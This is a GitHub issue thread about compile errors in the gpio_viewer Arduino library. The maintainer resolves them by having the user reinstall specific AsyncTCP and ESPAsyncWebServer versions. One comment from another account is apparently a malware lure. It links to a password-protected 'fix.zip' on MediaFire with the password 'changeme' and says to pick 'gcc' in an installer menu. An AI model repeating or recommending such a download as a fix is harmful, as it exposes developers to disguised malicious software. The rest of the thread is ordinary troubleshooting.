thelastoutpostworkshop/gpio_viewer #137: library dependency not installed w/base (gpio_viewere) library

mvschaefer, 2024-08-26:
-->
In file included from C:\.local\desktop\treadmill\esp32-treadmill-ctrl\vfb.cpp:15:
c:\Users\schae\OneDrive\Documents\Arduino\libraries\GPIOViewer\src/gpio_viewer.h:11:10: fatal error: ESPAsyncWebServer.h: No such file or directory
   11 | #include <ESPAsyncWebServer.h>
      |          ^~~~~~~~~~~~~~~~~~~~~
compilation terminated.
exit status 1

Compilation error: exit status 1

CosionMa, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

mvschaefer, 2024-08-26:
during install of  library from above:
Install library dependencies
The library ESPAsyncWebServer:3.1.0 needs some other dependencies currently not installed:
- AsyncTCP
- ESPAsyncTCP
Would you like to install all the missing dependencies?

mvschaefer, 2024-08-26:
they were both installed as dependencies, the error is now:
c:\Users\schae\OneDrive\Documents\Arduino\libraries\ESPAsyncWebServer\src\WebAuthentication.cpp: In function 'bool getMD5(uint8_t*, uint16_t, char*)':
c:\Users\schae\OneDrive\Documents\Arduino\libraries\ESPAsyncWebServer\src\WebAuthentication.cpp:74:3: error: 'mbedtls_md5_starts_ret' was not declared in this scope; did you mean 'mbedtls_md5_starts'?
   74 |   mbedtls_md5_starts_ret(&_ctx);
      |   ^~~~~~~~~~~~~~~~~~~~~~
      |   mbedtls_md5_starts
c:\Users\schae\OneDrive\Documents\Arduino\libraries\ESPAsyncWebServer\src\WebAuthentication.cpp:75:3: error: 'mbedtls_md5_update_ret' was not declared in this scope; did you mean 'mbedtls_md5_update'?
   75 |   mbedtls_md5_update_ret(&_ctx, data, len);
      |   ^~~~~~~~~~~~~~~~~~~~~~
      |   mbedtls_md5_update
c:\Users\schae\OneDrive\Documents\Arduino\libraries\ESPAsyncWebServer\src\WebAuthentication.cpp:76:3: error: 'mbedtls_md5_finish_ret' was not declared in this scope; did you mean 'mbedtls_md5_finish'?
   76 |   mbedtls_md5_finish_ret(&_ctx, _buf);
      |   ^~~~~~~~~~~~~~~~~~~~~~
      |   mbedtls_md5_finish
c:\Users\schae\OneDrive\Documents\Arduino\libraries\ESPAsyncWebServer\src\AsyncEventSource.cpp: In member function 'void AsyncEventSourceClient::_queueMessage(AsyncEventSourceMessage*)':
c:\Users\schae\OneDrive\Documents\Arduino\libraries\ESPAsyncWebServer\src\AsyncEventSource.cpp:189:7: error: 'ets_printf' was not declared in this scope; did you mean 'vswprintf'?
  189 |       ets_printf("ERROR: Too many messages queued\n");
      |       ^~~~~~~~~~
      |       vswprintf
c:\Users\schae\OneDrive\Documents\Arduino\libraries\ESPAsyncWebServer\src\AsyncWebSocket.cpp: In member function 'void AsyncWebSocketClient::_queueMessage(AsyncWebSocketMessage*)':
c:\Users\schae\OneDrive\Documents\Arduino\libraries\ESPAsyncWebServer\src\AsyncWebSocket.cpp:549:7: error: 'ets_printf' was not declared in this scope; did you mean 'vswprintf'?
  549 |       ets_printf("ERROR: Too many messages queued\n");
      |       ^~~~~~~~~~
      |       vswprintf

exit status 1

Compilation error: exit status 1

mvschaefer, 2024-08-26:
p.s. im looking forward to getting gpio viewer operational!..

thelastoutpostworkshop, 2024-08-26:
I need further information to help you.
What board and version are you using when compiling ?

mvschaefer, 2024-08-26:
arduino 2.3.2
examples/gpioviewer.ino

in the arduino ide, i select ESP32 DEV MODULE, which works for other builds, the board itself is a generic amazon esp32 that has wifi and bt...

thelastoutpostworkshop, 2024-08-26:
In the board manager, you have to use ESP32 by Espressif : 
[image]

mvschaefer, 2024-08-26:
confirmed 3.0.4 is installed
- NOTE: removed arduino esp32 boards from board manager

error is:
c:\Users\schae\OneDrive\Documents\Arduino\libraries\ESPAsyncWebServer\src\WebAuthentication.cpp: In function 'bool getMD5(uint8_t*, uint16_t, char*)':
c:\Users\schae\OneDrive\Documents\Arduino\libraries\ESPAsyncWebServer\src\WebAuthentication.cpp:74:3: error: 'mbedtls_md5_starts_ret' was not declared in this scope; did you mean 'mbedtls_md5_starts'?
   74 |   mbedtls_md5_starts_ret(&_ctx);
      |   ^~~~~~~~~~~~~~~~~~~~~~
      |   mbedtls_md5_starts
c:\Users\schae\OneDrive\Documents\Arduino\libraries\ESPAsyncWebServer\src\WebAuthentication.cpp:75:3: error: 'mbedtls_md5_update_ret' was not declared in this scope; did you mean 'mbedtls_md5_update'?
   75 |   mbedtls_md5_update_ret(&_ctx, data, len);
      |   ^~~~~~~~~~~~~~~~~~~~~~
      |   mbedtls_md5_update
c:\Users\schae\OneDrive\Documents\Arduino\libraries\ESPAsyncWebServer\src\WebAuthentication.cpp:76:3: error: 'mbedtls_md5_finish_ret' was not declared in this scope; did you mean 'mbedtls_md5_finish'?
   76 |   mbedtls_md5_finish_ret(&_ctx, _buf);
      |   ^~~~~~~~~~~~~~~~~~~~~~
      |   mbedtls_md5_finish
c:\Users\schae\OneDrive\Documents\Arduino\libraries\ESPAsyncWebServer\src\AsyncEventSource.cpp: In member function 'void AsyncEventSourceClient::_queueMessage(AsyncEventSourceMessage*)':
c:\Users\schae\OneDrive\Documents\Arduino\libraries\ESPAsyncWebServer\src\AsyncEventSource.cpp:189:7: error: 'ets_printf' was not declared in this scope; did you mean 'vswprintf'?
  189 |       ets_printf("ERROR: Too many messages queued\n");
      |       ^~~~~~~~~~
      |       vswprintf
c:\Users\schae\OneDrive\Documents\Arduino\libraries\ESPAsyncWebServer\src\AsyncWebSocket.cpp: In member function 'void AsyncWebSocketClient::_queueMessage(AsyncWebSocketMessage*)':
c:\Users\schae\OneDrive\Documents\Arduino\libraries\ESPAsyncWebServer\src\AsyncWebSocket.cpp:549:7: error: 'ets_printf' was not declared in this scope; did you mean 'vswprintf'?
  549 |       ets_printf("ERROR: Too many messages queued\n");
      |       ^~~~~~~~~~
      |       vswprintf

exit status 1

Compilation error: exit status 1

thelastoutpostworkshop, 2024-08-26:
Try removing AsyncTCP and ESPAsyncTCP libraries et reinstalling them.
GPIOViewer library is tested against  AsyncTCP v1.1.4 and ESP Async WebServer v3.0.6

thelastoutpostworkshop, 2024-08-26:
[image]
[image]
[image]

mvschaefer, 2024-08-26:
build success after removing libraries an installing per above!

mvschaefer, 2024-08-26:
good comms:
GPIOViewer >> Release 1.5.6
GPIOViewer >> ESP32 Core Version 3.0.4
GPIOViewer >> Chip Model:ESP32-D0WD, revision:300
GPIOViewer >> No PSRAM
GPIOViewer >> Web Application URL is: http://10.0.0.232:8080

time to play - thanks for this tool!

thelastoutpostworkshop, 2024-08-26:
Glad it's now working!

closed 2024-08-26 by thelastoutpostworkshop